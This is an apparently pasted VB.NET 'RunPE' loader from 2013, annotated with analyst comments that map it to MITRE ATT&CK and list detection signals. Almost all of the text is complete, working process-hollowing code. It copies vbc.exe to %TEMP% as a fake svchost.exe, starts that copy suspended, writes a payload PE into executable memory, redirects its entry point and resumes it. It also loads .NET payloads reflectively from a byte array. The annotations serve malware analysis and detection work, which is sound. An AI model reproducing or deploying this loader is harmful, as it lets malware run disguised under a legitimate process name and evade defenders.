
RunPE (VB.NET)

a guest
Jan 22nd, 2013
  1. Imports System.Reflection
  2. Imports System.Runtime.InteropServices
  3. Imports System.Text
  4.  
  5. Public Class Form1
     ' Analyst summary: this form is a "RunPE" loader, i.e. process hollowing
     ' (MITRE ATT&CK T1055.012). On load it reads a PE file from disk, starts a
     ' suspended host process, replaces the host's image in memory with that PE and
     ' resumes the thread, so the payload runs under the host's name and PID.
     '
     ' What a defender can observe from the behaviour in this listing:
     '  - a file and process named svchost.exe under %TEMP% instead of System32,
     '    whose on-disk content is a copy of vbc.exe (masquerading, T1036.005);
     '  - a child created suspended, followed by NtUnmapViewOfSection,
     '    VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory,
     '    SetThreadContext and ResumeThread issued against it by the parent;
     '  - a child whose in-memory image no longer matches its file on disk
     '    (Sysmon reports this as Event ID 25, ProcessTampering);
     '  - the API names below stored as plain string literals in the assembly.
  6.  
         ' Runs the loader as soon as the form loads: reads C:\1.exe and hands the
         ' bytes to Inject with runInMemory = True. Inject only reads its filename
         ' argument on the runInMemory = False path, so the notepad.exe path passed
         ' here is never used; the host process is the svchost.exe copy in %TEMP%.
  7.     Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
  8.         Dim fFile() As Byte
  9.         fFile = FileIO.FileSystem.ReadAllBytes("C:\1.exe")
  10.         Inject(fFile, True, "C:\windows\system32\notepad.exe")
  11.     End Sub
  12.  
          ' Only ShellExecuteA, LoadLibraryA, GetProcAddress and (further down)
          ' CreateProcess are declared as imports. The memory-manipulation APIs are
          ' looked up by name at run time through CreateAPI, so they show up in the
          ' binary as string literals rather than as import declarations.
  13.     Public Declare Function ShellExecuteA Lib "Shell32" (ByVal Parent As IntPtr, ByVal OperationType As String, ByVal FileLocation As String, ByVal Parameters As String, ByVal StartDirectory As String, ByVal ShowType As Integer) As Integer
  14.     Public Declare Function LoadLibraryA Lib "kernel32" (ByVal name As String) As IntPtr
  15.     Public Declare Function GetProcAddress Lib "kernel32" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
          ' Resolves export `method` from library `name` via LoadLibraryA and
          ' GetProcAddress and wraps the returned pointer in a delegate of type T.
          ' Neither native return value is checked before it is used.
  16.     Public Shared Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
  17.         Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
  18.     End Function
          ' Delegate signatures for the dynamically resolved APIs. The one-letter
          ' names are bound in Inject as follows:
          '   a = GetThreadContext      b = WriteProcessMemory
          '   c = NtUnmapViewOfSection  d = ReadProcessMemory
          '   f = ResumeThread          g = SetThreadContext
          '   h = VirtualAllocEx        i = VirtualProtectEx
          ' The thread context is passed as a raw UInteger array, not a structure.
  19.     Public Delegate Function a(ByVal hThr As IntPtr, ByVal ctxt() As UInteger) As <MarshalAs(UnmanagedType.Bool)> Boolean
  20.     Public Delegate Function b(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByVal buff() As Byte, ByVal size As IntPtr, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  21.     Public Delegate Function c(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
  22.     Public Delegate Function d(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As IntPtr, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  23.     Public Delegate Function f(ByVal hThr As IntPtr) As Integer
  24.     Public Delegate Function g(ByVal hThr As IntPtr, ByVal ctxt() As UInteger) As <MarshalAs(UnmanagedType.Bool)> Boolean
  25.     Public Delegate Function h(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
  26.     Public Delegate Function i(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal newProt As Integer, ByRef oldProt As Integer) As <MarshalAs(UnmanagedType.Bool)> Boolean
          ' The values are Windows page-protection constants (PAGE_NOACCESS,
          ' PAGE_EXECUTE, PAGE_READONLY, PAGE_EXECUTE_READ, PAGE_READWRITE,
          ' PAGE_EXECUTE_READWRITE) -- presumably a per-section protection table.
          ' Nothing in this listing references the array, and VirtualProtectEx is
          ' resolved but never called, so the written image stays in the single
          ' PAGE_EXECUTE_READWRITE region requested from VirtualAllocEx. A large
          ' private RWX region holding a PE image is a useful memory-scan signal.
  27.     Private Shared ReadOnly prot As Integer() = New Integer() {1, &H10, 2, &H20, 4, &H40, 4, &H40}
          ' CreateProcess is declared with STARTUPINFO and PROCESS_INFORMATION as
          ' raw arrays. Inject reads pInfo(0) as the process handle and pInfo(1) as
          ' the primary thread handle.
  28.     <DllImport("kernel32")> Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, _
  29.       ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, _
  30.       ByVal creation As Integer, ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo() As Byte, _
  31.       ByVal pInfo() As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  32.     End Function
          ' Launches the supplied executable image.
          '   bytes       - raw file content of the payload.
          '   runInMemory - False: write the payload to %TEMP% and open it.
          '                 True:  load it reflectively if it is a .NET assembly,
          '                        otherwise hollow it into the staged host process.
          '   filename    - file name appended to %TEMP%; only read when
          '                 runInMemory is False.
          ' Declared without a return type, so the result is an Object holding a
          ' Boolean. False is returned only when an exception is caught; a step that
          ' merely reports failure through its return value still ends in True.
  33.     Public Shared Function Inject(ByVal bytes() As Byte, ByVal runInMemory As Boolean, Optional ByVal filename As String = Nothing)
              ' Bind the native APIs by name at run time (see CreateAPI).
  34.         Dim GTC As a = CreateAPI(Of a)("kernel32", "GetThreadContext")
  35.         Dim WPM As b = CreateAPI(Of b)("kernel32", "WriteProcessMemory")
  36.         Dim NMVS As c = CreateAPI(Of c)("ntdll", "NtUnmapViewOfSection")
  37.         Dim RPM As d = CreateAPI(Of d)("kernel32", "ReadProcessMemory")
  38.         Dim RT As f = CreateAPI(Of f)("kernel32", "ResumeThread")
  39.         Dim STC As g = CreateAPI(Of g)("kernel32", "SetThreadContext")
  40.         Dim VAE As h = CreateAPI(Of h)("kernel32", "VirtualAllocEx")
  41.         Dim VPE As i = CreateAPI(Of i)("kernel32", "VirtualProtectEx")
  42.         Dim directory As String = IO.Path.GetTempPath
  43.         Try
                  ' Stage the host binary: copy the .NET 2.0 VB compiler (vbc.exe)
                  ' to %TEMP%\xcoca.ine, then rename it to svchost.exe. Every
                  ' failure here is swallowed and execution continues.
  44.             Try
  45.                 IO.File.Copy(IO.Path.GetDirectoryName(Environment.SystemDirectory) & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe", directory & "xcoca.ine", True)
  46.                 My.Computer.FileSystem.RenameFile(directory & "xcoca.ine", "svchost.exe")
  47.             Catch
  48.                 Exit Try
  49.             End Try
  50.             If Not runInMemory Then
                      ' Disk path: drop the payload into %TEMP% under the caller's
                      ' file name and open it through the shell (show type 10 is
                      ' SW_SHOWDEFAULT).
  51.                 IO.File.WriteAllBytes(directory & filename, bytes)
  52.                 ShellExecuteA(0, "open", directory & filename, vbNullString, vbNullString, 10)
  53.             Else
                      ' Managed payloads are run inside this process by NetRun
                      ' instead of being hollowed into a child.
  54.                 If NetRun.isDotNet(bytes) Then
  55.                     NetRun.RunNet(bytes)
  56.                 Else
                          ' 4 IntPtr slots stand in for PROCESS_INFORMATION and 68
                          ' bytes for STARTUPINFO; both sizes match the 32-bit
                          ' layouts of those structures.
  57.                     Dim procAttr As IntPtr = IntPtr.Zero
  58.                     Dim processInfo As IntPtr() = New IntPtr(3) {}
  59.                     Dim startupInfo As Byte() = New Byte(67) {}
  60.  
                          ' Raw PE header reads taken straight from the input with no
                          ' signature or bounds checks. The offsets match a PE32
                          ' (32-bit) header: 60 = e_lfanew, +6 = NumberOfSections,
                          ' +&H54 = SizeOfHeaders.
  61.                     Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
  62.                     Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
  63.                     Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
  64.  
                          ' Start %TEMP%\svchost.exe with creation flag 4
                          ' (CREATE_SUSPENDED): the process exists but its primary
                          ' thread has not run yet.
  65.                     If CreateProcess(Nothing, New StringBuilder(directory & "svchost.exe"), procAttr, procAttr, False, 4, _
  66.                      procAttr, Nothing, startupInfo, processInfo) Then
                              ' 179 DWORDs is the size of the 32-bit CONTEXT
                              ' structure; element 0 is ContextFlags, here asking
                              ' for the integer registers.
  67.                         Dim ctxt As UInteger() = New UInteger(178) {}
  68.                         ctxt(0) = &H10002
  69.                         If GTC(processInfo(1), ctxt) Then
                                  ' Element &H29 is Ebx in the x86 CONTEXT layout,
                                  ' which points at the new process's PEB while the
                                  ' thread is still suspended; +8 is the PEB's image
                                  ' base field.
  70.                             Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
  71.  
  72.                             Dim buffer__1 As IntPtr = IntPtr.Zero
  73.                             Dim bufferSize As New IntPtr(4)
  74.  
  75.                             Dim numRead As IntPtr = IntPtr.Zero
  76.  
                                  ' Read the host's current image base from its PEB,
                                  ' then unmap that image from the child.
  77.                             If RPM(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NMVS(processInfo(0), buffer__1) = 0) Then
                                      ' Allocate SizeOfImage (+80) bytes at the
                                      ' payload's ImageBase (+&H34) in the child:
                                      ' &H3000 = MEM_COMMIT Or MEM_RESERVE,
                                      ' &H40 = PAGE_EXECUTE_READWRITE.
  78.                                 Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
  79.                                 Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
  80.                                 Dim lpBaseAddress As IntPtr = VAE(processInfo(0), addr, size, &H3000, &H40)
  81.  
  82.                                 Dim lpNumberOfBytesWritten As Integer
  83.  
                                      ' Write the PE headers, then each section. A
                                      ' section header is 40 bytes starting at
                                      ' +&HF8; dst(3) = VirtualAddress,
                                      ' dst(4) = SizeOfRawData,
                                      ' dst(5) = PointerToRawData. All of these come
                                      ' from the input file unvalidated.
  84.                                 WPM(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
  85.                                 Dim num5 As Integer = num - 1
  86.                                 For i As Integer = 0 To num5
  87.                                     Dim dst As Integer() = New Integer(9) {}
  88.                                     Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
  89.                                     Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
  90.                                     Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
  91.  
                                          ' `size` and `addr` are reused here as the
                                          ' destination address and byte count.
  92.                                     size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
  93.                                     addr = New IntPtr(buffer2.Length)
  94.  
  95.                                     WPM(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
  96.                                 Next
                                      ' Point the PEB image base field at the new
                                      ' allocation (4-byte write).
  97.                                 size = New IntPtr(ctxt(&H29) + 8L)
  98.                                 addr = New IntPtr(4)
  99.  
  100.                                 WPM(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                                       ' Element &H2C is Eax in the x86 CONTEXT
                                       ' layout; it is set to the new base plus
                                       ' AddressOfEntryPoint (+40) and the context
                                       ' is written back to the suspended thread.
  101.                                 ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
  102.                                 STC(processInfo(1), ctxt)
  103.                             End If
  104.                         End If
                               ' The thread is resumed whenever CreateProcess
                               ' succeeded, including when the steps above were
                               ' skipped. The process and thread handles are not
                               ' closed anywhere in this function.
  105.                         RT(processInfo(1))
  106.                     End If
  107.                 End If
  108.             End If
  109.         Catch
  110.             Return False
  111.         End Try
  112.         Return True
  113.     End Function
  114. End Class
  115. Public Class NetRun
       ' Runs a managed (.NET) payload from a byte array inside the current process
       ' (reflective code loading, MITRE ATT&CK T1620). Nothing is written to disk
       ' on this path, so the loaded assembly has no backing file; an assembly
       ' loaded from a byte array with a thread started at its entry point is the
       ' behaviour to look for in CLR load telemetry.
           ' Starts a new STA thread and passes the payload bytes as the thread
           ' argument. AddressOf RunNet presumably binds to the Object overload
           ' below, the one that matches a parameterised thread start.
  116.     Shared Sub RunNet(ByVal datatorun As Byte())
  117.         Dim netthread As New System.Threading.Thread(AddressOf RunNet)
  118.         netthread.SetApartmentState(System.Threading.ApartmentState.STA)
  119.         netthread.Start(datatorun)
  120.     End Sub
           ' Thread body: loads the assembly from the byte array and invokes its
           ' entry point. The argument list always holds exactly one String()
           ' containing "1".."n", where n is the entry point's parameter count;
           ' the values are placeholders, not real command-line arguments.
  121.     Shared Sub RunNet(ByVal netobject As Object)
               ' Despite its name, netthread holds the entry point's MethodInfo.
  122.         Dim netthread As System.Reflection.MethodInfo = System.Reflection.Assembly.Load(DirectCast(netobject, Byte())).EntryPoint
  123.         Dim ObjectList As New System.Collections.Generic.List(Of String)
  124.         Dim ObjectList2 As New System.Collections.Generic.List(Of String())
  125.         Dim Object1 As Object
  126.         Dim integer1 As Integer = 0
  127.         For integer1 = 1 To netthread.GetParameters.Length
  128.             ObjectList.Add(integer1.ToString)
  129.         Next
  130.         ObjectList2.Add(ObjectList.ToArray)
  131.         Object1 = ObjectList2.ToArray
               ' Nothing as the target: the entry point is invoked as a Shared method.
  132.         netthread.Invoke(Nothing, Object1)
  133.     End Sub
           ' Reports whether the bytes load as a .NET assembly. The probe is a full
           ' Assembly.Load, so a managed payload is already loaded into this
           ' process here, before RunNet loads it a second time. Any exception is
           ' treated as "not .NET".
  134.     Shared Function isDotNet(ByVal bytesdotnet As Byte()) As Boolean
  135.         Try
  136.             Assembly.Load(bytesdotnet)
  137.             Return True
  138.         Catch
  139.             Return False
  140.         End Try
  141.     End Function
  142. End Class